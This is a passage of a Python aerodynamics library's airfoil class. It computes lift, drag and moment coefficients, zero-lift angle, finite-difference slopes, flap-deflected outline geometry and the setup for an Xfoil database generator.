s1 = 0.26\n elif surface == \"bottom\":\n s0 = 0.74\n s1 = 0.76\n elif surface == \"leading_edge\":\n s0 = 0.49\n s1 = 0.51\n\n # Initial points on outline\n x0 = self._x_outline(s0)\n y0 = self._y_outline(s0)\n x1 = self._x_outline(s1)\n y1 = self._y_outline(s1)\n\n # Initial distances\n d0 = self._distance(x0, y0, xc, yc, b)\n d1 = self._distance(x1, y1, xc, yc, b)\n\n # Secant method\n while abs(d1) > 1e-10:\n \n # Get new estimate in s\n if d1 > 0.2 or (s1 > 0.35 and s1 < 0.65): # Apply some relaxation when we're far away or near the leading edge (to keep from shooting to the other surface)\n s2 = s1-0.2*d1*(s0-s1)/(d0-d1)\n else:\n s2 = s1-d1*(s0-s1)/(d0-d1)\n\n # Make sure we're in bounds\n if s2 > 1.1:\n s2 = 1-0.01*s2\n if s2 < -0.1:\n s2 = -0.01*s2\n\n # Get new point\n x2 = self._x_outline(s2)\n y2 = self._y_outline(s2)\n\n 
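# Note on the update above: this is a relaxed secant step. The full step
# s2 = s1 - d1*(s0-s1)/(d0-d1) drives the signed distance d toward zero; the
# 0.2 factor damps the step when far from the root or near the leading edge so
# the iterate cannot jump to the opposite surface, and the two clamps fold
# out-of-range s values back toward [0, 1].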
# Get new distance\n d2 = self._distance(x2, y2, xc, yc, b)\n\n # Plot\n if plot:\n plt.figure()\n s_space = np.linspace(0.0, 1.0, 10000)\n plt.plot(self._x_outline(s_space), self._y_outline(s_space), 'b')\n plt.plot(xc, yc, 'or')\n plt.plot(x0, y0, 'bx')\n plt.plot(x1, y1, 'gx')\n plt.plot(x2, y2, 'rx')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Update for next iteration\n s0 = s1\n d0 = d1\n x0 = x1\n y0 = y1\n\n s1 = s2\n d1 = d2\n x1 = x2\n y1 = y2\n\n return x1, y1, s1\n\n\n def _distance(self, x0, y0, x, y, b):\n if not np.isnan(b) and not np.isinf(b):\n return (-b*x0+y0+b*x-y)/np.sqrt(b*b+1)\n else:\n return abs(x0-x)\n\n\n def check_against_NACA(self, naca_des):\n \"\"\"Checks the error in the camber and thickness against that predicted by the NACA equations. This is recommended as a check for the user\n if unusual geometries are being imported. Checks against the open trailing edge formulation of the NACA equations.\n\n Parameters\n ----------\n naca_des : str\n NACA designation of the airfoil to compare against as a string. May only be 4-digit series.\n \"\"\"\n\n print(\"Checking estimated thickness and camber against NACA equations for NACA {0}...\".format(naca_des))\n\n # 4-digit series\n if len(naca_des) == 4:\n\n # Generate true coordinates\n x_space = np.linspace(0.0, 1.0, 10000)\n m = float(naca_des[0])/100\n p = float(naca_des[1])/10\n if p != 0.0:\n y_c_true = np.where(x_space0.19198621771937624, -0.4995016675499485*np.abs(d_f)+1.09589743589744, 1.0)\n return hinge_eff*flap_eff*eps_flap_ideal*d_f\n\n\n def _get_database_data(self, data_index, **kwargs):\n # Returns an interpolated data point from the database.\n # data_index: 0 = CL, 1 = CD, 2 = Cm\n\n # Determine size of query\n max_size = 1\n for dof in self._dof_db_order:\n param = kwargs.get(dof, self._dof_defaults[dof])\n if isinstance(param, np.ndarray):\n max_size = max(max_size, param.shape[0])\n\n # Get params\n param_vals = np.zeros((max_size,self._num_dofs))\n for i, dof in enumerate(self._dof_db_order):\n param_vals[:,i] = kwargs.get(dof, self._dof_defaults[dof])\n\n # Interpolate\n return_val = interp.griddata(self._normed_ind_vars, self._data[:,self._num_dofs+data_index].flatten(), param_vals/self._data_norms, method='linear').flatten()\n #return_val = interp.griddata(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+data_index].flatten(), param_vals, method='linear').flatten()\n\n # Check for going out of bounds\n if np.isnan(return_val).any():\n raise DatabaseBoundsError(self.name, np.argwhere(np.isnan(return_val)).flatten(), kwargs)\n\n # Return\n if max_size == 1:\n return return_val.item()\n else:\n return return_val\n\n\n def get_CL(self, **kwargs):\n \"\"\"Returns the coefficient of lift. Note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n To do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. 
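# A standalone sketch of the normalized interpolation used by _get_database_data
# above: each independent-variable column is scaled by its maximum absolute value
# before scipy.interpolate.griddata is called, so Reynolds number (~1e6) cannot
# dwarf angle of attack (~1e-1) in the interpolator's distance metric. The data
# values here are invented for the example.
import numpy as np
import scipy.interpolate as interp

data = np.array([[0.00, 1.0e6, 0.31],
                 [0.10, 1.0e6, 0.85],
                 [0.00, 2.0e6, 0.33],
                 [0.10, 2.0e6, 0.88]])   # columns: alpha, Rey, CL
ind_vars = data[:, :2]
norms = np.max(np.abs(ind_vars), axis=0)
norms[norms == 0.0] = 1.0                # guard against dividing by zero

query = np.array([[0.05, 1.5e6]])
CL = interp.griddata(ind_vars/norms, data[:, 2], query/norms, method='linear')
print(CL)                                # ~0.59 at the midpoint of the data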
Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Lift coefficient\n \"\"\"\n \n # Linearized model\n if self._type == \"linear\":\n\n # Get params\n alpha = kwargs.get(\"alpha\", 0.0)\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # Calculate lift coefficient\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n CL = self._CLa*(alpha-self._aL0)\n else:\n delta_a_d_f = self._get_flap_influence(c_f, d_f)\n CL = self._CLa*(alpha-self._aL0+delta_a_d_f)\n \n # Saturate\n with np.errstate(invalid='ignore'):\n if isinstance(CL, np.ndarray):\n CL = np.where((CL > self._CL_max) | (CL < -self._CL_max), np.sign(CL)*self._CL_max, CL)\n elif CL > self._CL_max or CL < -self._CL_max:\n CL = np.sign(CL)*self._CL_max\n\n # Functional model\n elif self._type == \"functional\":\n CL = self._CL(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n CL = self._get_database_data(0, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n CL = self._get_polynomial_data(0, **kwargs)\n\n return CL\n\n\n def get_CD(self, **kwargs):\n \"\"\"Returns the coefficient of drag. Note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n To do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Drag coefficient\n \"\"\"\n\n # Linear type\n if self._type == \"linear\":\n d_f = kwargs.pop(\"trailing_flap_deflection\", 0.0)\n CL = self.get_CL(**kwargs)\n CD_flap = 0.002*np.abs(np.degrees(d_f)) # A *very* rough estimate for flaps\n CD = self._CD0+self._CD1*CL+self._CD2*CL**2+CD_flap\n\n # Functional model\n elif self._type == \"functional\":\n CD = self._CD(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n CD = self._get_database_data(1, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n CD = self._get_polynomial_data(1, **kwargs)\n\n return CD\n\n\n def get_Cm(self, **kwargs):\n \"\"\"Returns the moment coefficient. Note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n To do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_moment_deriv : float or ndarray, optional\n Change in section moment with respect to trailing flap deflection. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. 
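# In isolation, the 'linear' branch of get_CL above reduces to the sketch below;
# the coefficient values are invented for the example:
import numpy as np

CLa, aL0, CL_max = 6.28, -0.036, 1.4
alpha = np.radians(np.array([-5.0, 0.0, 10.0, 18.0]))
CL = CLa*(alpha - aL0)
# Saturate at +/- CL_max, exactly as the np.where clamp above does
CL = np.where(np.abs(CL) > CL_max, np.sign(CL)*CL_max, CL)
print(CL)  # the 18-degree entry clamps to 1.4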
Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Moment coefficient\n \"\"\"\n\n # Linear type\n if self._type == \"linear\":\n\n # Get parameters\n alpha = kwargs.get(\"alpha\", 0.0)\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # No control deflection\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n Cm = self._CmL0+self._Cma*(alpha-self._aL0)\n else:\n theta_f = np.arccos(2.0*c_f-1.0)\n Cm_df = 0.25*(np.sin(2.0*theta_f)-2.0*np.sin(theta_f))\n Cm = self._CmL0+self._Cma*(alpha-self._aL0)+Cm_df*d_f\n\n # Functional model\n elif self._type == \"functional\":\n Cm = self._Cm(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n Cm = self._get_database_data(2, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n Cm = self._get_polynomial_data(2, **kwargs)\n\n return Cm\n\n\n def get_aL0(self, **kwargs):\n \"\"\"Returns the zero-lift angle of attack, taking flap deflection into account.\n\n Parameters\n ----------\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float\n Zero-lift angle of attack\n \"\"\"\n\n # Linear airfoil model\n if self._type == \"linear\":\n\n # Get params\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # Calculate lift coefficient\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n aL0 = self._aL0\n else:\n delta_a_d_f = self._get_flap_influence(c_f, d_f)\n aL0 = self._aL0-delta_a_d_f\n \n return aL0\n\n # Database/poly fit/functional\n # Use secant method in alpha to find a_L0\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Remove alpha from kwargs\n kwargs.pop('alpha', None)\n\n # Initialize secant method\n a0 = 0.0\n CL0 = self.get_CL(alpha=a0, **kwargs)\n a0 = np.zeros_like(CL0)\n a1 = np.zeros_like(CL0)+0.01\n CL1 = self.get_CL(alpha=a1, **kwargs)\n a2 = np.zeros_like(CL1)\n\n # If we're outside the domain of the database, aL0 should be nan\n if a2.size == 1:\n if np.isnan(CL1):\n a2 = np.nan\n else:\n a2[np.where(np.isnan(CL1))] = np.nan\n \n # Iterate\n np.seterr(invalid='ignore')\n not_converged = np.where(np.array(np.abs(CL1)>1e-10))[0]\n while not_converged.size>0:\n \n # Update estimate\n if a2.size == 1:\n a2 = (a1-CL1*(a0-a1)/(CL0-CL1))\n else:\n a2[not_converged] = (a1-CL1*(a0-a1)/(CL0-CL1))[not_converged]\n CL2 = self.get_CL(alpha=a2, **kwargs)\n\n # Update for next iteration\n a0 = np.copy(a1)\n CL0 = np.copy(CL1)\n a1 = np.copy(a2)\n CL1 = np.copy(CL2)\n\n # Check convergence\n not_converged = np.where(np.array(np.abs(CL1)>1e-10))[0]\n\n np.seterr()\n return a2\n\n\n def get_CLM(self, **kwargs):\n \"\"\"Returns the lift slope with respect to Mach number using a forward-difference approximation.\n Simply returns 0 for a type 'linear' airfoil.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. 
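# Worked example for the thin-airfoil flap moment used in get_Cm above, assuming
# a quarter-chord flap (c_f = 0.25):
#
#     theta_f = arccos(2*0.25 - 1) = arccos(-0.5) = 2*pi/3
#     Cm_df   = 0.25*(sin(2*theta_f) - 2*sin(theta_f))
#             = 0.25*(-0.8660 - 1.7321) = -0.6495
#
# so each radian of flap deflection shifts Cm by roughly -0.65.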
Defaults to 0.\n\n dx : float\n Step size for finite-difference equation. Defaults to 0.05.\n\n Returns\n -------\n float or ndarray\n Lift slope with respect to Mach number\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return 0.0\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on Mach\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"Mach\" not in self._dof_db_order:\n return 0.0\n\n # Get center Mach value\n dx = kwargs.get(\"dx\", 0.05)\n Mach = kwargs.pop(\"Mach\", 0.0)\n \n # Calculate forward and center points (since we'll often be at M=0 and negative M doesn't work)\n CL1 = self.get_CL(Mach=Mach+dx, **kwargs)\n CL0 = self.get_CL(Mach=Mach, **kwargs)\n\n return (CL1-CL0)/dx\n\n\n def get_CLRe(self, **kwargs):\n \"\"\"Returns the lift slope with respect to Reynolds number using a central-difference approximation.\n Simply returns 0 for a type 'linear' airfoil.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n dx : float\n Step size for finite-difference equation. Defaults to 1000.\n\n Returns\n -------\n float or ndarray\n Lift slope with respect to Reynolds number\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return 0.0\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on Re\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"Rey\" not in self._dof_db_order:\n return 0.0\n\n # Get center Re value\n dx = kwargs.get(\"dx\", 1000)\n Rey = kwargs.pop(\"Rey\", 1000000)\n \n # Calculate forward and backward points\n CL1 = self.get_CL(Rey=Rey+dx, **kwargs)\n CL0 = self.get_CL(Rey=Rey-dx, **kwargs)\n\n return (CL1-CL0)/(2*dx)\n\n\n def get_CLa(self, **kwargs):\n \"\"\"Returns the lift slope using a central-difference approximation.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n dx : float, optional\n Step size for finite-difference equation. 
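# The two difference stencils used by these getters, sketched on a stand-in
# function (get_CLM is one-sided because the database cannot be queried at
# negative Mach; get_CLRe and get_CLa are central):
import math

def f(x):
    return math.sin(x)  # stand-in for, e.g., CL as a function of one variable

dx = 0.05
forward = (f(0.0 + dx) - f(0.0))/dx            # O(dx), safe at a domain boundary
central = (f(0.5 + dx) - f(0.5 - dx))/(2*dx)   # O(dx**2), needs both sides
print(forward, central)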
Defaults to 0.001 radians.\n\n Returns\n -------\n float or ndarray\n Lift slope\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return self._CLa\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on alpha\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"alpha\" not in self._dof_db_order:\n return 0.0\n\n # Get center alpha value\n dx = kwargs.get(\"dx\", 0.001)\n alpha = kwargs.pop(\"alpha\", 0.0)\n \n # Calculate forward and backward points\n CL1 = self.get_CL(alpha=alpha+dx, **kwargs)\n CL0 = self.get_CL(alpha=alpha-dx, **kwargs)\n\n return (CL1-CL0)/(2*dx)\n\n\n def get_thickness(self, x):\n \"\"\"Returns the thickness normal to the camber line at the specified x location(s).\n\n Parameters\n ----------\n x : float or ndarray\n x location(s) at which to get the thickness.\n\n Returns\n -------\n float or ndarray\n Thickness as a percentage of the chord.\n \"\"\"\n if isinstance(x, float):\n return self._thickness(x).item()\n else:\n return self._thickness(x)\n\n\n def get_max_thickness(self):\n \"\"\"Returns the maximum thickness of the airfoil, divided by the chord length.\n \"\"\"\n return self._max_thickness\n\n\n def get_camber(self, x):\n \"\"\"Returns the y coordinate(s) of the camber line at the specified x location(s).\n\n Parameters\n ----------\n x : float or ndarray\n x location(s) at which to get the camber.\n\n Returns\n -------\n float or ndarray\n Camber line y coordinate(s) as a percentage of the chord.\n \"\"\"\n if isinstance(x, float):\n return self._camber_line(x).item()\n else:\n return self._camber_line(x)\n\n\n def get_max_camber(self):\n \"\"\"Returns the maximum camber of the airfoil, divided by the chord length.\n \"\"\"\n return self._max_camber\n\n\n def get_outline_points(self, **kwargs):\n \"\"\"Returns an array of outline points showing the geometry of the airfoil.\n\n Parameters\n ----------\n N : int, optional\n The number of outline points to return. This function will not always return exactly this many,\n but never more. Defaults to 200.\n\n cluster : bool, optional\n Whether to cluster points about the leading and trailing edges. Defaults to True.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians (positive down). Defaults to zero.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord. Defaults to zero.\n\n export : str, optional\n If specified, the outline points will be saved to a file. Defaults to no file.\n\n top_first : bool, optional\n The order of the coordinates when exported. Defaults to going from the trailing edge along the top and\n then around to the bottom.\n\n close_te : bool, optional\n Whether the top and bottom trailing edge points should be forced to be equal. Defaults to False.\n\n plot : bool, optional\n Whether a plot of the outline points should be displayed once computed. Defaults to False.\n\n original_points : bool, optional\n Whether this should simply return the original inputted points. If set to True, all other kwargs relating\n to the geometry will be ignored. 
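# A hypothetical call exercising the kwargs documented above; the airfoil
# instance 'af' and the export filename are assumptions for the example:
#
#     import math
#     pts = af.get_outline_points(N=200, cluster=True,
#                                 trailing_flap_deflection=math.radians(10.0),
#                                 trailing_flap_fraction=0.25,
#                                 close_te=True, export="foil_flapped.txt")
#     # pts is an (N', 2) array running trailing edge -> top -> leading edge -> bottom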
Defaults to False.\n\n Returns\n -------\n ndarray\n Outline points in airfoil coordinates.\n \"\"\"\n\n # Check the geometry has been defined\n if self.geom_specification != \"none\":\n\n # Get kwargs\n N = kwargs.get(\"N\", 200)\n cluster = kwargs.get(\"cluster\", True)\n trailing_flap_deflection = kwargs.get(\"trailing_flap_deflection\", 0.0)\n trailing_flap_fraction = kwargs.get(\"trailing_flap_fraction\", 0.0)\n close_te = kwargs.get(\"close_te\", False)\n\n if not kwargs.get(\"original_points\", False):\n \n # Zach's method of determining NACA airfoils with deflected parabolic flaps (actually works really well for all of them...)\n\n # Get flap parameters\n d_f = trailing_flap_deflection\n x_f = 1.0-trailing_flap_fraction\n y_f = self._input_dict.get(\"trailing_flap_hinge_height\", self._camber_line(x_f))\n \n # Calculate distributions\n theta_c = np.linspace(np.pi, -np.pi, N) # Loop over entire airfoil from TE->top->LE->bottom->TE\n if cluster:\n x_c = 0.5*(1.0-np.cos(theta_c))\n else:\n x_c = abs(np.linspace(-1.0, 1.0, N))\n \n # Calculate undeformed camber line and thickness\n y_c = self._camber_line(x_c)\n t = self._thickness(x_c)\n dyc_dx = self._camber_deriv(x_c)\n \n if d_f != 0.0 and x_f < 1.0:\n # Determine which camber points belong to the flap\n flap_ind = np.where(x_c>x_f)\n\n # Linear flap\n if self._trailing_flap_type == \"linear\":\n\n # Calculate deflected camber line Eqs. (8-10) in \"Geometry and Aerodynamic Performance of Parabolic...\" by Hunsaker, et al. 2018\n r = np.sqrt((y_c-y_f)*(y_c-y_f)+(x_c-x_f)*(x_c-x_f))\n psi = np.arctan((y_c-y_f)/(x_c-x_f))\n x_c[flap_ind] = x_f+(r*np.cos(d_f-psi))[flap_ind]\n y_c[flap_ind] = y_f-(r*np.sin(d_f-psi))[flap_ind]\n dyc_dx[flap_ind] = np.gradient(y_c[flap_ind], x_c[flap_ind], edge_order=2)\n\n else:\n # Parabolic flap from \"Geometry and Aerodynamic Performance of Parabolic...\" by Hunsaker, et al. 
2018\n\n # Calculate the neutral line parameters\n l_n = np.sqrt(y_f*y_f+(1-x_f)*(1-x_f))\n phi_n = -np.arctan2(y_f, 1-x_f)\n\n # Calculate the location of the deflected trailing edge\n tan_df = np.tan(d_f)\n R = np.sqrt(4*tan_df*tan_df+1)+np.arcsinh(2*tan_df)/(2*tan_df)\n E_te = 2.0*l_n/R\n\n # Find E_p using secant method\n\n # Constants\n R_tan_df = R*tan_df\n R_tan_df2 = R_tan_df*R_tan_df\n E_0 = ((x_c-x_f)/(1-x_f)*l_n)[flap_ind]\n\n # Initial guesses\n E_p0 = E_te*E_0/l_n\n R0 = E_p0/2*np.sqrt(E_p0**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p0/l_n*R_tan_df)-E_0\n E_p1 = E_te*E_0/l_n+0.001\n R1 = E_p1/2*np.sqrt(E_p1**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p1/l_n*R_tan_df)-E_0\n\n # Suppress warnings because an error will often occur within the np.where that has no effect on computation\n with np.errstate(invalid='ignore'):\n \n # Iterate\n while (abs(R1)>1e-10).any():\n\n # Update value\n E_p2 = np.where(np.abs(R0-R1) != 0.0, E_p1-R1*(E_p0-E_p1)/(R0-R1), E_p1)\n\n # Get residual\n R2 = E_p2/2*np.sqrt(E_p2**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p2/l_n*R_tan_df)-E_0\n\n # Update for next iteration\n E_p0 = E_p1\n R0 = R1\n E_p1 = E_p2\n R1 = R2\n\n # Store final result\n E_p = E_p1\n n_p = -E_p*E_p/E_te*tan_df\n\n # Calculate deflected neutral line\n x_p = x_f+E_p*np.cos(phi_n)-n_p*np.sin(phi_n)\n y_p = y_f+E_p*np.sin(phi_n)+n_p*np.cos(phi_n)\n y_nl = y_f*(1-(x_c-x_f)/(1.0-x_f))\n dy_c = (y_c-y_nl)[flap_ind]\n\n # Calculate deflected camber line\n C = np.arctan(2*E_p/E_te*tan_df)\n x_c[flap_ind] = x_p+dy_c*np.sin(C)\n y_c[flap_ind] = y_p+dy_c*np.cos(C)\n\n dyc_dx[flap_ind] = (dyc_dx[flap_ind] - 2*E_p*tan_df/E_te) / (1 + 2*E_p*tan_df/E_te*dyc_dx[flap_ind])\n\n # Outline points\n X = x_c-t*np.sin(np.arctan(dyc_dx))*np.sign(theta_c)\n Y = y_c+t*np.cos(np.arctan(dyc_dx))*np.sign(theta_c)\n\n # Trim overlapping points from linear flap deflection\n if self._trailing_flap_type == \"linear\" and d_f != 0.0 and x_f < 1.0:\n\n # Get indices of top and bottom points\n top_ind = theta_c > 0.0\n bot_ind = theta_c <= 0.0\n\n # Split points into top and bottom\n X_t = X[top_ind]\n Y_t = Y[top_ind]\n X_b = X[bot_ind]\n Y_b = Y[bot_ind]\n\n # Find the point on the surface where the hinge breaks\n # These equations determine the slope of the line bisecting the angle between the camber line before the flap\n # and the camber line of the flap\n psi_prime = np.pi+np.arctan(self._camber_deriv(x_f)) # Angle to the camber line before the flap\n d_f_prime = -d_f+np.arctan(self._camber_deriv(x_f)) # Angle to the camber line after the flap\n phi = 0.5*(psi_prime+d_f_prime)\n b = np.tan(phi)\n x_t_break, y_t_break, _ = self._get_intersection_point(x_f, y_f, b, \"top\")\n x_b_break, y_b_break, _ = self._get_intersection_point(x_f, y_f, b, \"bottom\")\n\n # Trim overlapping points off of both surfaces\n X_b, Y_b, num_trimmed_from_bot = self._trim_surface(X_b, Y_b, \"forward\")\n X_t, Y_t, num_trimmed_from_top = self._trim_surface(X_t, Y_t, \"backward\")\n\n # Check if we need to fill anything in so the number of outline points remains the same\n if num_trimmed_from_bot>0:\n r_t = self._get_cart_dist(x_t_break, y_t_break, x_f, y_f)\n X_t, Y_t = self._fill_surface(X_t, Y_t, x_f, y_f, r_t, x_t_break, num_trimmed_from_bot, \"backward\")\n\n if num_trimmed_from_top>0:\n r_b = self._get_cart_dist(x_b_break, y_b_break, x_f, y_f)\n X_b, Y_b = self._fill_surface(X_b, Y_b, x_f, y_f, r_b, x_b_break, num_trimmed_from_top, \"forward\")\n\n # Concatenate top and bottom points\n X = 
np.concatenate([X_t, X_b])\n Y = np.concatenate([Y_t, Y_b])\n\n # Make sure the trailing edge is sealed\n if close_te:\n x_te = 0.5*(X[0]+X[-1])\n y_te = 0.5*(Y[0]+Y[-1])\n X[0] = x_te\n Y[0] = y_te\n X[-1] = x_te\n Y[-1] = y_te\n\n # Just use the original points\n else:\n X = self._raw_outline[:,0]\n Y = self._raw_outline[:,1]\n\n # Plot result\n if kwargs.get(\"plot\", False):\n plt.figure()\n plt.plot(X, Y)\n #plt.plot(x_t_break, y_t_break, 'rx')\n #plt.plot(x_b_break, y_b_break, 'rx')\n #plt.plot(x_f, y_f, 'rx')\n plt.plot(x_c, y_c, 'r--')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title(self.name)\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Concatenate x and y\n outline_points = np.concatenate([X[:,np.newaxis], Y[:,np.newaxis]], axis=1)\n if not kwargs.get(\"top_first\", True):\n outline_points = outline_points[::-1,:]\n \n # Save to file\n export = kwargs.get(\"export\", None)\n if export is not None:\n np.savetxt(export, outline_points, fmt='%10.8f')\n\n return outline_points\n\n else:\n raise RuntimeError(\"The geometry has not been defined for airfoil {0}. Outline points cannot be generated.\".format(self.name))\n\n\n def _trim_surface(self, X, Y, direction):\n # Trims any points within a region of doubling back in x\n\n # Loop through points\n trim_indices = []\n rev = False\n fwd = False\n\n # Determine direction\n indices = range(X.shape[0])\n if direction == \"backward\":\n indices = indices[::-1]\n \n # Loop through points\n trim_indices = []\n i_prev = 0\n for i in indices:\n \n # Skip first third of the section so we don't end up trimming off the nose\n if X[i] < 0.3:\n continue\n\n # Check if we've started going backwards\n if not rev and X[i] < X[i_prev]:\n rev = i_prev\n\n # Check if we've started going forward again\n if rev and not fwd and X[i] > X[i_prev]:\n fwd = i_prev\n break\n\n i_prev = i\n \n # Trim and insert\n if rev and fwd:\n\n # Determine where to trim\n if direction == \"forward\":\n trim_indices = list(range(rev, fwd+1))\n else:\n trim_indices = list(range(fwd, rev+1))\n\n # Trim\n X = np.delete(X, trim_indices)\n Y = np.delete(Y, trim_indices)\n\n return X, Y, len(trim_indices)\n \n else:\n return X, Y, 0\n\n\n\n def _fill_surface(self, X, Y, x_h, y_h, r, x_break, num_points, direction):\n # Fills in num_points along the arc defined by x_h, y_h, and r\n\n # Determine direction\n indices = range(X.shape[0])\n if direction == \"backward\":\n indices = indices[::-1]\n\n # Find the two points we need to fill in between\n for i in indices:\n \n # Skip first third of the section\n if X[i] < 0.3:\n continue\n\n if X[i] > x_break:\n fill_start = i-1\n fill_stop = i\n break\n\n # No filling needed, apparently...\n else:\n return X, Y\n\n # Get angles from the hinge point to the start and stop points\n theta0 = math.atan2(Y[fill_start]-y_h, X[fill_start]-x_h)\n theta1 = math.atan2(Y[fill_stop]-y_h, X[fill_stop]-x_h)\n\n # Find fill in points\n theta_fill = np.linspace(theta0, theta1, num_points+2)[1:-1]\n x_fill = x_h+r*np.cos(theta_fill)\n y_fill = y_h+r*np.sin(theta_fill)\n\n return np.insert(X, fill_stop, x_fill), np.insert(Y, fill_stop, y_fill)\n\n\n def _get_closest_point_on_surface(self, x, y, surface):\n # Finds the point on the surface of the airfoil which is closest to the given point using Golden section search\n # Returns the coordinates and the radius from the given point\n\n # Decide where to start in s\n if surface == \"top\":\n s0 = 0.0\n s3 = 0.5\n else:\n s0 = 0.5\n s3 = 1.0\n\n # Get Golden ratio\n R = 
2.0/(1.0+math.sqrt(5.0))\n\n # Loop until interval converges\n while abs(s0-s3)>1e-10:\n \n # Get interior points\n diff = s3-s0\n s1 = s3-diff*R\n s2 = s0+diff*R\n\n # Calculate points\n x1 = self._x_outline(s1)\n y1 = self._y_outline(s1)\n x2 = self._x_outline(s2)\n y2 = self._y_outline(s2)\n \n # Calculate distances\n d1 = self._get_cart_dist(x, y, x1, y1)\n d2 = self._get_cart_dist(x, y, x2, y2)\n\n # Check\n if d1 < d2:\n s3 = s2\n else:\n s0 = s1\n\n return x1, y1, d1\n\n\n def _get_cart_dist(self, x0, y0, x1, y1):\n x_diff = x0-x1\n y_diff = y0-y1\n return math.sqrt(x_diff*x_diff+y_diff*y_diff)\n\n\n def generate_database(self, **kwargs):\n \"\"\"Makes calls to Xfoil to calculate CL, CD, and Cm as a function of each given degree of freedom.\n\n Parameters\n ----------\n degrees_of_freedom : dict\n A dict specifying which degrees of freedom the database should perturb. Allowable degrees of \n freedom are \"alpha\", \"Rey\", \"Mach\", \"trailing_flap_deflection\", and \"trailing_flap_fraction\".\n\n Each key should be one of these degrees of freedom. To specify a range for the degree of freedom,\n a dictionary with the following keys should be given:\n\n \"range\" : list\n The lower and upper limits for this DOF.\n\n \"steps\" : int\n The number of points in the range to interrogate.\n\n \"index\" : int\n Index of the column for this degree of freedom in the database.\n\n \"log_step\" : bool, optional\n Whether the steps in this dof should be spaced linearly (False) or logarithmically\n (True). Defaults to False.\n\n If instead of perturbing a variable, you want the database to be evaluated at a constant value of\n that variable, a float should be given 